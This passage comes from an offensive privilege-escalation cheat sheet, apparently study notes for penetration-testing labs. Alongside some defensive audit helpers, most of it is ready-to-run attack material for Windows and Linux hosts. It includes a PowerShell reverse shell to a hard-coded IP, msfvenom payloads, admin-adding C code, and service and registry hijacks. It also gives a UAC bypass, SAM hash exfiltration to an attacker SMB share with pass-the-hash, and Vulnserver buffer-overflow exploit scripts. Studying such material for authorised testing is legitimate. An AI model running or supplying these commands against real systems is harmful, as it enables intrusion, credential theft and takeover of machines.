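/srv/backup   10.0.0.0/24(rw,sync,no_subtree_check)
/tmp          *(rw,sync,no_root_squash,no_subtree_check)
/srv/share    192.168.1.0/24(ro,root_squash) 10.0.0.5(rw,no_root_squash)
"""

# "<client>(<opt>,<opt>,...)" -- several clauses may follow one path
CLIENT_RE = re.compile(r"([^\s(]+)\(([^)]*)\)")


def parse_exports(text):
    """Yield (path, client, options) for every client clause in /etc/exports."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], parts[1] if len(parts) > 1 else ""
        for m in CLIENT_RE.finditer(rest):
            yield path, m.group(1), m.group(2).split(",")


def risky_exports(text):
    """Exports where a remote root keeps UID 0 (no_root_squash) or everyone may mount."""
    findings = []
    for path, client, opts in parse_exports(text):
        reasons = []
        if "no_root_squash" in opts:
            reasons.append("no_root_squash")
        if client in ("*", "0.0.0.0/0"):
            reasons.append("exported to everyone")
        if reasons:
            findings.append((path, client, reasons))
    return findings


if __name__ == "__main__":
    for path, client, reasons in risky_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: {', '.join(reasons)}")
```

A clause with no explicit squash option gets the default, root_squash, which is why /srv/backup is not reported; exportfs -v on the server prints the effective option set if you want to confirm that.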
- Enumerate the kernel version with uname -a
- Find an exploit, example: searchsploit linux kernel 2.6.32 priv esc
- Some resources
- Find possible exploits with Linux Exploit Suggester 2
- Dirty COW | CVE-2016-5195
- CVE-2017-1000112
- Also known as "Abusing Setuid Binaries"
find /home/username/Desktop -exec "/usr/bin/bash" -p \;
- See more here: find | GTFOBins
/usr/sbin/getcap -r / 2>/dev/null
enumerate capabilities
- Search for cap_setuid+ep, meaning that the setuid capability is enabled, effective and permitted
- Search what you need in GTFOBins
- Example with Perl: perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
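cap_setuid is the clearest case, but it is one of several file capabilities that are root-equivalent on their own, and getcap prints them in two slightly different styles depending on the libcap version. The script below is an added example (not EasyG's code, not part of libcap) that parses getcap -r output, decodes the +ep / =eip flag suffix, and lists the binaries holding a dangerous capability as permitted or effective. SAMPLE_GETCAP and the DANGEROUS_CAPS descriptions are constructed for the example.

```python
import re

# Constructed `getcap -r / 2>/dev/null` output. Both libcap print styles are
# included: the older "path = caps+flags" and the newer "path caps=flags".
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/python3.8 cap_setuid=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/bin/tar cap_dac_read_search+p
"""

# Capabilities that by themselves give root-equivalent power (constructed list).
DANGEROUS_CAPS = {
    "cap_setuid": "may switch to UID 0",
    "cap_setgid": "may switch to GID 0",
    "cap_dac_override": "bypasses file read/write/execute permission checks",
    "cap_dac_read_search": "reads any file (e.g. /etc/shadow)",
    "cap_sys_admin": "broad administrative operations (mounts, namespaces)",
    "cap_sys_ptrace": "may attach to and control processes of any user",
    "cap_sys_module": "may load kernel modules",
    "cap_chown": "may change ownership of any file",
    "cap_fowner": "bypasses owner checks on files",
}
FLAG_NAMES = {"e": "effective", "p": "permitted", "i": "inheritable"}
CAP_RE = re.compile(r"^([a-z0-9_,]+)[=+]([eip]+)$")


def parse_getcap(text):
    """Yield (path, [caps], {flags}) for each getcap line."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        m = CAP_RE.match(parts[-1])        # last token holds "caps+flags" or "caps=flags"
        if m:
            yield parts[0], m.group(1).split(","), set(m.group(2))


def decode_flags(flags):
    """Spell out the +ep / =eip suffix in the order e, p, i."""
    return [FLAG_NAMES[f] for f in "epi" if f in flags]


def risky_capabilities(text):
    """Binaries holding a dangerous capability as permitted or effective."""
    out = []
    for path, caps, flags in parse_getcap(text):
        for cap in caps:
            if cap in DANGEROUS_CAPS and flags & {"e", "p"}:
                out.append((path, cap, DANGEROUS_CAPS[cap], decode_flags(flags)))
    return out


if __name__ == "__main__":
    for path, cap, why, flags in risky_capabilities(SAMPLE_GETCAP):
        print(f"{path}: {cap} ({', '.join(flags)}) {why}")
```

A capability that is only permitted (tar in the sample) is still reported: a program can raise a permitted capability into its effective set with capset at any time, so "permitted but not effective" is not a safe state for an interpreter or archiver.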
See Information gathering | Windows. Always obtain:
- Username and hostname
- Group memberships of the current user
- Existing users and groups
- Operating system, version and architecture
- Network information
- Installed applications
- Running processes
Tools
- AccessChk
- Sysinternals
- MinGW-w64
- Windows Reverse Shells Cheatsheet
- Windows persistence
- Scripts
- Windows Privilege Escalation Awesome Scripts
- Seatbelt
.\Seatbelt.exe all
.\Seatbelt.exe -group=all -full
- PowerUp (archived)
- PowerUpSQL
- Windows-privesc-check
windows-privesc-check2.exe -h
windows-privesc-check2.exe --dump -G
- creddump7
- Paper: Abusing Token Privileges For EoP
- List your privileges:
whoami /priv
SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeDebugPrivilege
- Check your user (whoami) and groups (net user <username>)
- Run winPEAS with fast, searchfast, and cmd options
- Run Seatbelt & other scripts
- Check also: PayloadsAllTheThings/Methodology and Resources/Windows - Privilege Escalation.md
- Have a quick look around for files in your user’s desktop and other common locations
- Read through interesting files
- Try things that don’t have many steps first (e.g. registry exploits, services, etc.)
- Look at admin processes, enumerate their versions and search for exploits
- Check for internal ports that you might be able to forward to your attacking machine
#include <stdlib.h>
int main () {
int i;
i = system ("net user /add [username] [password]");
i = system ("net localgroup administrators [username] /add");
return 0;
}
- 32-bit Windows executable:
i686-w64-mingw32-gcc adduser.c -o adduser.exe
- 64-bit Windows executable:
x86_64-w64-mingw32-gcc -o adduser.exe adduser.c
- Note: 32-bit and 64-bit Windows: Frequently asked questions
- Generate the reverse shell on your attacker machine: msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o reverse.exe
- Transfer it to the Windows machine with SMB: sudo python3 /opt/impacket/examples/smbserver.py kali . and then copy \\<IP>\kali\reverse.exe C:\PrivEsc\reverse.exe
Create a PowerShell remoting session via WinRM
$password = ConvertTo-SecureString <password> -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<username>", $password)
Enter-PSSession -ComputerName <computer_name> -Credential $cred
Check also:
- Windows Reverse Shells Cheatsheet
- Evil-WinRM
evil-winrm -i <IP> -u <username> -p <password>
- powershell_reverse_shell.ps1
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Other shells with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=8444 EXITFUNC=thread -f exe -o shell.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=445 -f exe -e x64/xor -o shell.exe
msfvenom -f psh-cmd -p windows/shell_reverse_tcp LHOST=tun0 LPORT=8443 -o rev.ps1
msfvenom -f ps1 -p windows/shell_reverse_tcp LHOST=tun0 LPORT=8443 -o rev.ps1
msfvenom -p windows/shell_reverse_tcp --list formats
msfvenom -p windows/shell_reverse_tcp --list-options
- Save the output of the systeminfo command: systeminfo > systeminfo.txt
- Try also the command: systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
- Use it with Windows Exploit Suggester to find potential exploits: python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less
- See also: Watson
- See windows-kernel-exploits
- Enumerate the drivers that are installed on the system: driverquery /v
- Search in the Exploit Database
Note: to find running services, use this command from PowerShell: Get-Service, or Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
Service Commands
sc.exe qc <name> Query the configuration of a service
sc.exe query <name> Query the current status of a service
sc.exe config <name> <option>= <value> Modify a configuration option of a service
net start/stop <name> Start/Stop a service
Insecure Service Permissions
- Use AccessChk to check the "user" account's permissions on the "daclsvc" service: C:\PrivEsc\accesschk.exe /accepteula -uwcqv <user> <service>
- If SERVICE_CHANGE_CONFIG is present, it's possible to change the service configuration
- Query the service with sc qc <service>. If it runs with SYSTEM privileges, privilege escalation is possible
- Example: SERVICE_START_NAME: LocalSystem
- Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse shell executable: sc config <service> binpath= "\"C:\PrivEsc\reverse.exe\""
- Set a listener and start the service: net start <service>
Unquoted Service Path
- Check: "Microsoft Windows Unquoted Service Path Vulnerability"
- Query a service with sc qc <service>. If it runs with SYSTEM privileges (check SERVICE_START_NAME) and the BINARY_PATH_NAME value is unquoted and contains spaces, privilege escalation is possible
- Example: BINARY_PATH_NAME: C:\Program Files\Unquoted Path Service\Common Results\unquotedpathservice.exe
- You can also list candidate services with the following wmic command: wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
- Use AccessChk to check write permissions in this directory: C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
- You can review the permissions with icacls "C:\" and icacls "C:\Program Files\Enterprise Apps"
- Check if you can run and stop the service with Start-Service GammaService and Stop-Service
- Copy the reverse shell: copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
- Start a listener on the attacker machine and run the service
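The "Insecure Service Permissions" and "Unquoted Service Path" checks above both start from the same sc qc output and the same two questions: which account does the service run as, and what does the service controller do with its BINARY_PATH_NAME. The script below is an added example (not EasyG's code, not a Microsoft tool) that parses sc qc output and, for an unquoted path with spaces, enumerates the executables Windows would try before reaching the real one: exactly the locations an administrator must keep non-writable (the page's Common.exe is one of them). SAMPLE_SC_QC is constructed to the real tool's layout using the page's example path; PRIVILEGED_ACCOUNTS is an assumed list.

```python
import re

# Constructed `sc qc <service>` output (same layout as the real tool prints);
# the path is the page's example value, the service name is hypothetical.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Results\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")
# Accounts whose token is worth hijacking a service for (assumed list).
PRIVILEGED_ACCOUNTS = {"localsystem", r"nt authority\system",
                       r"nt authority\localservice", r"nt authority\networkservice"}


def parse_sc_qc(text):
    """Map the FIELD : value rows of `sc qc` output into a dict."""
    cfg = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m and m.group(1) not in cfg:
            cfg[m.group(1)] = m.group(2)
    return cfg


def unquoted_candidates(binary_path):
    """Executables the service controller would try, in order, for an unquoted
    path containing spaces: CreateProcess cuts the string at each space and
    appends .exe until something runs. Quoted paths yield a single entry, and
    the walk stops at the first token ending in .exe (so trailing arguments
    such as '-k netsvcs' do not create extra candidates)."""
    path = binary_path.strip()
    if path.startswith('"'):
        return [path.split('"')[1]]
    tokens = path.split(" ")
    cands = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(".exe"):
            cands.append(prefix)
            break
        cands.append(prefix + ".exe")
    return cands


def audit_service(sc_qc_text):
    """Summarise one service: privileged account plus ambiguous path is the finding."""
    cfg = parse_sc_qc(sc_qc_text)
    cands = unquoted_candidates(cfg.get("BINARY_PATH_NAME", ""))
    return {
        "service": cfg.get("SERVICE_NAME"),
        "account": cfg.get("SERVICE_START_NAME"),
        "runs_privileged": cfg.get("SERVICE_START_NAME", "").lower() in PRIVILEGED_ACCOUNTS,
        "unquoted_with_spaces": len(cands) > 1,
        # every path here must not be creatable by unprivileged users
        "ambiguous_paths": cands[:-1],
    }


if __name__ == "__main__":
    result = audit_service(SAMPLE_SC_QC)
    print(result["service"], "runs as", result["account"])
    for p in result["ambiguous_paths"]:
        print("  would be tried first:", p)
```

The defensive fix is the one the sc config line above hints at in reverse: quote the path (sc config <service> binPath= "\"C:\Program Files\...\service.exe\"") and make sure the intermediate directories are only writable by administrators.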
Weak Registry Permissions
- Query a service with sc qc <service>. Check if it runs with SYSTEM privileges (check SERVICE_START_NAME)
- Use AccessChk to check the write permissions of the registry entry for the service: C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\<service>
- note: the NT AUTHORITY\INTERACTIVE group means all logged-on users
- Overwrite the ImagePath registry key to point to the reverse shell executable: reg add HKLM\SYSTEM\CurrentControlSet\services\<service> /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
- Start a listener on the attacker machine and run the service
DLL Hijacking
- See: DLL Hijacking
Example:
- Even if we are logged in as an administrative user, we must move to a high integrity level in order to change the admin user's password.
- To do it, run the following commands
<# spawn a cmd.exe process with high integrity #>
powershell.exe Start-Process cmd.exe -Verb runAs
<# successfully changing the password of the admin user after spawning cmd.exe with high integrity #>
whoami /groups
net user admin Ev!lpass
UAC Bypass with fodhelper.exe, a Microsoft support application responsible for managing language changes in the operating system. Runs as high integrity on Windows 10 1709
- "First entry: Welcome and fileless UAC bypass"
- "UAC Bypass – Fodhelper"
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
Also called "Service Binary Hijacking". Exploit insecure file permissions on services that run as nt authority\system
- List running services on Windows using PowerShell: Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
- Enumerate the permissions on the target service: icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
- For this scenario, any user (BUILTIN\Users) on the system has full read and write access to it
- See also "Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation"
- Substitute ServiioService.exe with the following
#include <stdlib.h>
int main () {
    int i;
    i = system ("net user [username] [password] /add");
    i = system ("net localgroup administrators [username] /add");
    return 0;
}
- Cross-compile the C code with i686-w64-mingw32-gcc adduser.c -o adduser.exe (32-bit) or x86_64-w64-mingw32-gcc adduser.c -o adduser.exe (64-bit application), then replace the binary:
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
dir "C:\Program Files\Serviio\bin\"
- Restart the service, here are two options
net stop Serviio
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'Serviio'}
Obtain the Startup Type for the Serviio service
- Check the Startmode of the service with wmic service where caption="Serviio" get name, caption, state, startmode
- If it's Auto, it means that it will restart after a reboot. Reboot with shutdown /r /t 0.
- Check if it worked with net localgroup Administrators
PowerUp.ps1
- Check PowerUp.ps1 and make it available with python3 -m http.server 80
- Download it from the victim machine: iwr -uri http://<IP>/PowerUp.ps1 -Outfile PowerUp.ps1
- Run the commands powershell -ep bypass and . .\PowerUp.ps1
- Then run Get-ModifiableServiceFile to display services the current user can modify
- Run Install-ServiceBinary -Name 'mysql'. If it throws an error even if you already know that the current user has full access permissions on the service binary, proceed with manual exploitation
AutoRuns
- Query the registry for AutoRun executables: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Use AccessChk to check write permissions of the executables: C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\<program>.exe"
- Overwrite the executable in the <program> path with the reverse shell: copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
- Start a listener on the attacker machine. A new session on the victim machine will trigger a reverse shell running with admin privileges
AlwaysInstallElevated
- Query the registry for the AlwaysInstallElevated keys (the value must be set in both hives):
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- Note if both keys are set to 1 (0x1)
- Generate a reverse shell installer .msi with msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o reverse.msi
- Transfer the installer .msi to the Windows machine
- Start a listener on the attacker machine and then run the installer to trigger a reverse shell running with SYSTEM privileges: msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
Registry
- Search for keys and values that contain the word "password"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
- If you have found an admin and its password, use the winexe command from the attacker machine to spawn a command prompt running with the admin privileges: winexe -U 'admin%password' //<IP> cmd.exe
Saved Credentials
- Check for any saved credentials: cmdkey /list
- Start a listener on the attacker machine and run the reverse shell executable using runas with the admin user's saved credentials: runas /savecred /user:admin C:\PrivEsc\reverse.exe
Search for Configuration Files
- Run the commands dir /s *pass* == *.config and findstr /si password *.xml *.ini *.txt
- Use winPEAS to search for common files which may contain credentials: .\winPEASany.exe quiet cmd searchfast filesinfo
- Also run .\winPEASx64.exe windowscreds filesinfo fileanalysis searchpf log=winpeas_out.txt
Security Account Manager (SAM)
- The SAM and SYSTEM files can be used to extract user password hashes. Check also backups of these files:
copy C:\Windows\Repair\SAM \\<IP>\kali\
copy C:\Windows\Repair\SYSTEM \\<IP>\kali\
- Dump the hashes with "creddump7": python3 creddump7/pwdump.py SYSTEM SAM
- Crack the hashes with hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt
Passing The Hash
- Use the hashes to authenticate: pth-winexe -U 'admin%hash' //<IP Victim> cmd.exe
- List all scheduled tasks your user can see: schtasks /query /fo LIST /v
- In PowerShell: Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
- Search in Task Manager for any scheduled task
- See if you find any .ps1 script
- If the script found runs as SYSTEM, check its write permissions with C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\<script>.ps1
- Add to it a line to run the reverse shell: echo C:\PrivEsc\reverse.exe >> C:\<script>.ps1
- For the .exe, review the permissions with icacls C:\Users\Documents\service.exe
- If you have full access permissions, substitute the .exe as in the section Insecure File Permissions
- Open an app. Look at the privilege level it runs with: tasklist /V | findstr mspaint.exe
- If the app runs with admin privileges and gives the possibility to open a file dialog box, click in the navigation input and paste: file://c:/windows/system32/cmd.exe
- Note if the BUILTIN\Users group can write files to the StartUp directory: C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
- Using cscript, run the following script to create a new shortcut of the reverse shell executable in the StartUp directory:
Set oWS = WScript.CreateObject("WScript.Shell")
sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"
Set oLink = oWS.CreateShortcut(sLinkFile)
oLink.TargetPath = "C:\PrivEsc\reverse.exe"
oLink.Save
- Manually enumerate all running programs: tasklist /v
- With seatbelt: .\seatbelt.exe NonstandardProcesses
- With winPEAS: .\winPEASany.exe quiet procesinfo
- Search for the applications' versions
- Try running the executable with /? or -h, as well as checking config or text files in the Program Files directory
- Use Exploit-DB to search for a corresponding exploit
Note: This attack works on Windows 7, 8, early versions of Windows 10, and their server counterparts.
- See Hot Potato, get the exploit here
- Start a listener on the attacker machine
- Run the exploit:
.\potato.exe -ip 192.168.1.33 -cmd "C:\PrivEsc\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
- Wait for a Windows Defender update (or trigger one manually)
- See Rogue Potato
- Set up a socat redirector on the attacker machine, forwarding its port 135 to port 9999 on Windows
sudo socat tcp-listen:135,reuseaddr,fork tcp:<Windows IP>:9999
- Execute the PoC:
.\RoguePotato.exe -r YOUR_IP -e "command" -l 9999
- Check Juicy Potato, it's an improved version
More Potatoes
- Usage 1
- Copy PSExec64.exe and the PrintSpoofer.exe exploit executable over to the Windows machine
- Using an administrator command prompt, use PSExec64.exe to trigger a reverse shell running as the Local Service service account: C:\PrivEsc\PSExec64.exe /accepteula -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
- Run the PrintSpoofer exploit to trigger a reverse shell running with SYSTEM privileges: C:\PrivEsc\PrintSpoofer.exe -i -c "C:\PrivEsc\reverse.exe"
- Usage 2
- Copy the PrintSpoofer.exe exploit executable over to the Windows machine and run .\PrintSpoofer64.exe -i -c powershell.exe
- Access Tokens: When a user first logs in, this object is created and linked to their active session. A copy of the user's principal access token is added to the new process when they launch it.
- Impersonation Access Token: When a process or thread momentarily needs to run with another user's security context, this object is created.
- Token Duplication: Windows permits processes and threads to use multiple access tokens. This allows for the duplication of an impersonation access token into a main access token. If we have the ability to inject into a process, we can leverage this feature to copy the process's access token and launch a new process with the same rights.
- Documentation: Meterpreter getsystem | Metasploit Documentation
Tools
- Immunity Debugger + mona
- Vulnserver
- Note: usually, <port vulnserver> is 9999
- Kali
- See also Buffer Overflows Made Easy | The Cyber Mentor
- mingw-w64, a cross-compiler for programs written to be compiled on Windows. With it you can compile them in an OS like Linux
- Example of usage: i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
- See also: Buffer Overflow Prep
Issues
- "Problems attach Immunity to Vulnserver on Windows 10": Don't start vulnserver, start Immunity as Admin, File > Open > vulnserver.exe, push "play".
Steps to conduct a Buffer Overflow
- Spiking
- Fuzzing
- Finding the Offset
- Overwriting the EIP
- Finding bad characters
- Finding the right module
- Generating Shellcode
generic_send_tcp <IP Vulnserver> <port vulnserver> script.spk 0 0
Example: trun.spk
s_readline();
s_string("TRUN ");
s_string_variable("0");
#!/usr/bin/python3
import sys, socket
from time import sleep

buffer = "A" * 100

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('<IP Vulnserver>', <port vulnserver>))
        s.send(('TRUN /.:/' + buffer).encode())
        s.close()
        sleep(1)
        buffer += "A" * 100
    except:
        print("Fuzzing crashed at %s bytes" % str(len(buffer)))
        sys.exit()
- Get the result from:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <bytes_where_server_crashed>
- Modify the previous script in
#!/usr/bin/python3 import sys, socket from time import sleep offset = "RESULT_FROM_STEP_1" while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('<IP Vulnserver>', <port vulnserver>)) s.send(('TRUN /.:/' + offset).encode()) s.close() except: print ("Error connecting to the server") sys.exit()
- After running the script, read the value from the EIP
- With that value, run this script:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q EIP_VALUE_STEP_2
From the previous result, we should get the position 2003 for the start of the EIP. We can test this by sending `A * 2003` plus `B * 4` and see if EIP = `42424242` (since `42424242` = `BBBB`).
#!/usr/bin/python3
import sys, socket
from time import sleep

shellcode = "A" * 2003 + "B" * 4

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('<IP Vulnserver>', <port vulnserver>))
        s.send(('TRUN /.:/' + shellcode).encode())
        s.close()
    except:
        print("Error connecting to the server")
        sys.exit()
You can generate a string of bad chars with the following python script
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')
print()
The following python script is used to find bad chars
#!/usr/bin/python3
import sys, socket
from time import sleep

# every byte value except \x00, which is already known to be bad (string terminator)
badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
            b"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
            b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
            b"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
            b"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
            b"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
            b"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
            b"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

# bytes, not str: with a str, .encode() would turn \x80-\xff into two UTF-8 bytes each
shellcode = b"A" * 2003 + b"B" * 4 + badchars

while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('<IP Vulnserver>', <port vulnserver>))
        s.send(b'TRUN /.:/' + shellcode)
        s.close()
    except:
        print("Error connecting to the server")
        sys.exit()
- After starting the script, once vulnserver breaks down, go in Immunity Debugger > Registers > Right-click on ESP > Follow in Dump > See Hex dump.
- Check if the Hex dump makes sense, e.g. in the Hex dump there is no number value missing.
- Example: you may get a result like `... 01 02 03 B0 B0 06 07 08 ...`. As you can see, `04` and `05` are missing, so you've found a bad character.
- Write down every character missing
Another solution to the step 3, with mona and Immunity Debugger:
- Set the working directory with `!mona config -set workingfolder c:\mona`
- Generate bad characters with `!mona bytearray -cpb "\x00"` from Immunity Debugger
- Notice the new files in `c:\mona`
- Run the python script of this section
- Execute the command `!mona compare -f c:\mona\bytearray.bin -a <address of ESP>`
- Note: this may cause false positives
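The offset and bad-character steps above can be checked offline. The Python helpers below are an added example, not code from the EasyG notes, from Metasploit or from mona: they reimplement the cyclic-pattern logic of pattern_create.rb / pattern_offset.rb and the sent-versus-dumped comparison that `!mona compare` and the manual hex-dump inspection perform. The EIP value `386F4337` and the dump bytes in the usage section are constructed inputs; `2003` is what the pattern scheme yields for that value in a 3000-byte pattern, matching the worked figure in the notes.

```python
#!/usr/bin/env python3
"""Offline helpers for the 'Finding the Offset' and 'Finding bad characters' steps.
Added example (not from the original notes); sample EIP value and dumps are constructed."""
import itertools

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length):
    """Cyclic pattern in the Metasploit scheme: Aa0Aa1...Aa9Ab0...
    Every 4-byte window is unique within the usable range, which is what
    lets us map the value found in EIP back to an offset in the buffer."""
    out = []
    for u, l, d in itertools.product(UPPER, LOWER, DIGITS):
        out.append(u + l + d)
        if 3 * len(out) >= length:
            break
    return "".join(out)[:length]


def pattern_offset(pattern, eip_hex):
    """Offset in `pattern` of the 4 bytes that landed in EIP.
    The debugger shows the register big-endian (e.g. 386F4337) but x86 stores
    it little-endian, so the bytes are reversed before searching.
    Returns -1 when EIP does not hold pattern bytes."""
    chunk = bytes.fromhex(eip_hex)[::-1].decode("ascii", errors="replace")
    return pattern.find(chunk)


def badchars_all(exclude=(0x00,)):
    """All byte values except the ones already known to be bad
    (0x00 here), i.e. the same set the generator script above prints."""
    return bytes(b for b in range(256) if b not in exclude)


def find_badchars(sent, dumped):
    """Walk the bytes that were sent against what was read back from the stack.
    A byte is reported as bad when the dump does not contain it at the expected
    place; we then resync on the next expected byte so that one dropped or
    rewritten byte does not flag everything after it."""
    bad = []
    j = 0                                  # cursor into `dumped`
    for i, b in enumerate(sent):
        if j < len(dumped) and dumped[j] == b:
            j += 1
            continue
        bad.append(b)
        if i + 1 < len(sent):
            k = dumped.find(bytes([sent[i + 1]]), j)
            if k != -1:
                j = k
    return bad


def msfvenom_badchars(bad):
    """Format the list the way the -b option of msfvenom expects it."""
    return "".join("\\x%02x" % b for b in bad)


if __name__ == "__main__":
    pattern = pattern_create(3000)
    # constructed EIP value: the bytes a 3000-byte pattern places at offset 2003
    print("offset:", pattern_offset(pattern, "386F4337"))
    sent = bytes(range(1, 9))
    # constructed dump, same shape as the '01 02 03 B0 B0 06 07 08' example in the notes
    dumped = bytes([0x01, 0x02, 0x03, 0xB0, 0xB0, 0x06, 0x07, 0x08])
    print("bad chars:", msfvenom_badchars(find_badchars(sent, dumped)))
```

This is where the false-positive caveat from the mona step comes from: when a byte is rewritten rather than dropped (the `B0 B0` case), the byte after it is reported too, so remove the first suspect, run the check again and only then pass the list to `msfvenom -b`.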
Note: `JMP ESP` will be used as the pointer to jump to the shellcode. With nasm_shell.rb we can get the hex equivalent of these commands.
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000  FFE4              jmp esp
